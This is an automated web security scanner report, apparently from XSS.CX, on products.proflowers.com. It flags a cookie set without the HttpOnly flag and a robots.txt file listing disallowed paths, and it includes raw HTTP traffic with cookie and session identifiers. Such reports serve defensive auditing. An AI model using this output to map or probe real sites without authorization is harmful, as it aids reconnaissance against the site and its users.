Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM?30003767&5/9/2011 5:12:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:12:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:12:27 GMT
Content-Length: 139819


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...

6. Robots.txt file  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The web server contains a robots.txt file.

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.

Request

GET /robots.txt HTTP/1.0
Host: products.proflowers.com

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache, no-store
Content-Type: text/plain
Expires: Tue, 10 May 2011 07:16:18 GMT
Last-Modified: Thu, 20 Jan 2011 23:51:56 GMT
Accept-Ranges: bytes
ETag: "1CBB8FD04FB3600"
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:59 GMT
Connection: close
Content-Length: 925

User-agent: *
Disallow: /-/
Disallow: /./
Disallow: /flowers/pickmeupbouquet-43065
Disallow: /BusinessServicesCorporate-BSV/
Disallow: /businessservicescorporate-bsv/
Disallow: /-day/
Disallow
...[SNIP]...

Report generated by XSS.CX at Mon May 09 07:28:43 CDT 2011.